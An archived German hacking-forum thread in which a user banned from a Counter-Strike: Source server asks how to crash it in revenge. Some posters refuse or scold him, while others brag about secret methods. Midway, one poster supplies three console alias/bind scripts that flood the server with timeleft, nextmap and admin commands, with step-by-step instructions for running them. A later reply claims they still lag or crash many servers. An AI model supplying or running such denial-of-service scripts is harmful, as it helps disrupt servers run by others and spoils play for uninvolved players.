PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [S]How2crash css server



Marabunta
11.06.2009, 14:10
ich war mal wieder auf der suche nach tollen css servern bis ich auf einen freundlichen admin gestoßen bin der mir gezeigt hat wie man immer wieder seinen server verlässt ohne zurückzukommen
kurz:der wichser hat mich dauernd gebannt

und jetzt würd ich gern seinen server crashen lassen o. dafür sorgen das es solang wie ichs mach kein spass mehr auf dem server macht...

google spuckt 2jahre alte tuts aus von denen ich ausgeh das die nichtmehr funzen und die sufu half auch nicht aber da das ein kollege von mir schonmal gemacht hat weiß ich das es möglich ist xD nur is der übers wochenende weg...plz help^^

c1ox
11.06.2009, 14:14
Racheaktion? - Fail ^.^
Ich hätte dir was geben können - aber jetz nimmer ^.-

Marabunta
11.06.2009, 14:24
nein funaktion


bei welchen beweggründen hättest denn was gegeben o.O?!

c1ox
11.06.2009, 14:27
Wenn du eine verantwortungsvolle person wärst und nicht dann einfach sinnlos irgendwelhe server down machst - die admins haben dich sicher nicht einfach so gebannt.

Marabunta
11.06.2009, 14:37
1von4 admins hält mich für nen cheater aber ich cheate nicht und derzeit ist nur der 1 on....-.-

VooDoo666
11.06.2009, 14:41
Kein Mensch lässt CSS Server abstürzen, nur weil man von einem Server gebannt ist.
Btw den Bann kann man auch umgehen, nur so am Rand.

Zusätzlich wäre es doch einen Versuch wert, einen anderen Admin anzuschreiben, dass er dich bannt, jedoch bezweifel ich das es dir darum geht:D..

Naja ich wüsste auch wie(:P huhu c1ox), aber das sag ich hier nicht!

Marabunta
11.06.2009, 14:44
meinst das man nicht gebannt werden kann oder trotz ban wieder rein?ich kann wieder rein aber der bannt gleich wieder

hoschi111
11.06.2009, 14:54
gib mir mal die IP des Servers,
ich kann ihn nicht crashen lassen aber einen schönen TimeOut bekomm ich hin.

gavaSTAR™
11.06.2009, 14:54
naja ich würds auch gern wissen, *lach*


aber ich denke ihr solltet es nicht preisgeben da dann fast jeder server von jedem scriptkiddy down gemacht wird ^^

hoschi111
11.06.2009, 14:55
@ c1ox (http://free-hack.com/member.php?u=52296),
Ich bin an deiner Methode interessiert.
kannst du mir deine veriante verraten?
Wir können uns gegeseitig austauschen (PN)

VooDoo666
11.06.2009, 14:58
Würde jeder der fragt, die Methode bekommen, wären glaubich bald alle Server down.

Naja die Methode müsste eig public sein, bin mir aber nicht sicher:)..glaube aber eher nicht!

c1ox
11.06.2009, 15:00
Ne ist nich public ^.^

Marabunta
11.06.2009, 15:04
1.bin ich kein kiddy 2.mach ich nicht jeden server down 3.denkt euch 3.-.-

lolly
11.06.2009, 15:21
Glaube nicht, dass die Methode so Nonpub ist VooDoo :D Ich meine das ist sowas simples, da wäre DDoSen schwerer. Naja mich würds echt freuen wenns Nonpub wäre/bliebe, weil man nach einem Post hier im Forum keinen funktionierenden Server mehr hätte xD Desweiteren musste der Server bei der Methode doch ne bestimme Anforderung erfüllen oder? ;)

VooDoo666
11.06.2009, 15:25
Ja..aber wenn ich diese bedingung sage ist die katze ja schon ausm sack, also schweig lölly:>...noob

Marabunta
11.06.2009, 17:03
how about pm?^^

DarkFire
11.06.2009, 17:28
Desweiteren musste der Server bei der Methode doch ne bestimme Anforderung erfüllen oder? ;)

Die Bedingung ist bei fast jedem Server gegeben... (~90%)

hpoc
11.06.2009, 18:05
1.bin ich kein kiddy 2.mach ich nicht jeden server down 3.denkt euch 3.-.-Auf keinen Fall. Möchtest Dich einfach rächen weil DU gebannt wurdest. Sehr Erwachsen, muss ich schon sagen.

Zu den andern:
Ihr müsst euch echt toll vorkommen mit euren ach so "Non Public" Sachen. Würden alle so denken wie Ihr, würdet Ihr nie irgendwas exploiten.

Marabunta
11.06.2009, 18:09
meine güte ich hab doch nichtmal steam ihr müsst euch wegen mir keine gedanken um die server machen ich renn da net rum um alle zu crashen-.-

cephyr
11.06.2009, 18:17
wieso isn dir das so wichtig O.o??? ist doch völlig egal es gibt tausende server
ob du jetzt auf einem gebannt bist oder nich ist ja wurscht

VooDoo666
11.06.2009, 18:24
Ihr müsst euch echt toll vorkommen mit euren ach so "Non Public" Sachen. Würden alle so denken wie Ihr, würdet Ihr nie irgendwas exploiten.
Du musst dir echt lächerlich vorkommen, wenn du schon wieder so einen Schwachsinn von dir gibst!

Zum Topic: Google richtig, dann findest du einen einfachen und funktionierenden Weg!
*VooDoo*

hpoc
11.06.2009, 18:28
Wenn man die Wahrheit als lächerlich ansieht, dann bin ich gerne lächerlich.

CYSER
11.06.2009, 18:40
sucht einfach bei youtube ihr honks es geht^^, ich sag nur timeleft

Marabunta
11.06.2009, 18:42
ich sag nur: unknown command:alias -.- wtf!

c1ox
11.06.2009, 18:46
Dann lass es einfach sein, kind. x]
Timeleft unso ist schon lange gefixt.

G!smo
11.06.2009, 18:51
Es ist eigendlich ganz simpel...
Habe mir gerade mal nen kleines script geschrieben.
Kenne den Bug aber schon bisl länger und es funktioniert einwandfrei...
Finde es aber nicht sinnvoll es an irgendwelche Kiddy's weiterzureichen die damit sinnlos scheiße bauen und unschuldigen Gamern den Spaß am Spiel verderben...

@ Marabunta: Es gibt tausende Server! Warum suchst du dir nicht einfach nen anderen!?

Marabunta
11.06.2009, 19:02
habs gemerkt

weil des mein stammserver ist und ich mir von neuen admins die meinen alle grundlos bannenzukönnen nichts sagen lass

G!smo
11.06.2009, 20:41
Was für sinnlose Gründe...Reallife!?
Lass doch einfach gut sein!
Damit verdirbste viel mehr anderen Gamern dasd Vergnügen.
Und die Admins findens bestimmt auch net so schlimm...

Marabunta
11.06.2009, 21:00
rl kann mich mal!


Und die Admins findens bestimmt auch net so schlimm...

was sollen die nicht schlimm finden?!

auto
11.06.2009, 21:33
Schau dir das mal an http://de.truveo.com/css-server-crash/id/274055601 ka ob das funst hab kein css und warum sagt ihr dem das nich einfach? Hier gibts doch auch etliche Trojaner tuts etc. und jeder wieß das die kiddys damit auf beute zu gehen.

c1ox
11.06.2009, 21:37
geht schon lange nicht mehr und ist alt. hab ich schon gesagt.

Snack
11.06.2009, 23:10
Boahh warum den PN macht net so alls WÄREN DIE NP hier hast paar Exploits>>>


alias "spam" "say @timeleft ;say @nextmap ; say @timeleft"
alias "spam1" "spam;spam;spam;spam;spam;spam;spam;spam"
alias "spam2" "spam1;spam1;spam1;spam1;spam1;spam1;spam1;spam1;sp am1"

bind x "spam2"

---------------------------------------------------------------------------------

alias aspam "admin;admin;admin;admin;admin;admin;admin;timeleft ;timeleft;timeleft"
alias bspam "aspam;aspam;aspam;aspam;aspam"

bind i "bspam; bspam; bspam"

----------------------------------------------------------------------------------
//Server-Bash:

alias - "nextmap;timeleft"
alias = "-;-;-;-;-;-;-"
alias / "=;=;=;=;=;=;="
alias +spam "/;/"
alias -spam "/;/"

bind . +spam


der letzte funzzt am besten einfach neue .cfg erstellen und dort eingeben wenn du dann aufm ZielServer bist gibste in der konsole exec (NAME).cfg ein und dann kannste anfangen du siehst das am schluss immer bind . oder bind i dort geschrieben steht auf diese taste musste dann drücken wennste uffm server bist

ACHJA bei den ersten beiden Exploit sind fehler eingebaut nicht von mir

c1ox
11.06.2009, 23:18
fail omfg >.<
Die gehen seit JAHREN nimmer...

Crys!S
11.06.2009, 23:36
fail omfg >.<
Die gehen seit JAHREN nimmer...

Öhmmm doch die gehen... Aber nimmer auf allen Servern...

Bei zB. NGZ Servern gibt es ein sog. "Anti-DoS" Plugin
welches diese Art des Crashens / Laggens eines Servers via. Buffer Overflow
verhindert.

Bei vielen Servern funktioniert es jedoch noch wobei das meistens an den Admins liegt die ned rallen das irgend so ein Pissblach ihren Server Crasht und deshalb den Server 20-30mal neu Starten... -.-

Und diese sachen sind nicht Non Public die wurden schon vor ewigkeiten auf Cheat Pages wie zB. fkn0wned gepostet, jedoch finde ich es nicht gut jedem der danach fragt dieses direckt zu geben, da so auf vielen eigentlich guten Servern das Spielen mehr oder weniger unmöglich wird.
Wenn er unbedingt andere Server Crashen will soll er sich wenigstens so anstrengen und 5 minuten danach Googlen... sonst wird doch auch immer nur auf die sufu/google verwiesen...

Naja wie dem auch sei viel spaß damit... -.-

c1ox
11.06.2009, 23:42
Nimmer auf allen ? Die gehen auf fast keinem..
Und wir reden nicht von der methode ^.^

Snack
11.06.2009, 23:43
DER 2. EXPLOIT geht auf JEDEN Server noch !!!!! Einfach ausprobieren xD

G!smo
11.06.2009, 23:47
naja...funktioniert auch nicht immer...
Und ich meine auch noch ne andere methode die zu 100% funktioniert...
Könnte sein das c1ox und ich die selbe meinen...vllt pm...

drogii
11.06.2009, 23:57
naja die sache ist nicht die das wenn der exploit pub wird das es keine server mehr gäbe sondern eher das er in ein paar stunden gefixxt währe, kenne ihn ebenfalls aber finde es auch nicht sinnvoll ihn weiterzugeben und nein der exploit ist nicht public. ;)

hpoc
12.06.2009, 00:56
c1ox & G!smo euer NP gelaber nervt. Wenn Ihr eine ach so tolle NP Methode habt und Sie für euch behaltet, dann behaltet es ganz für euch.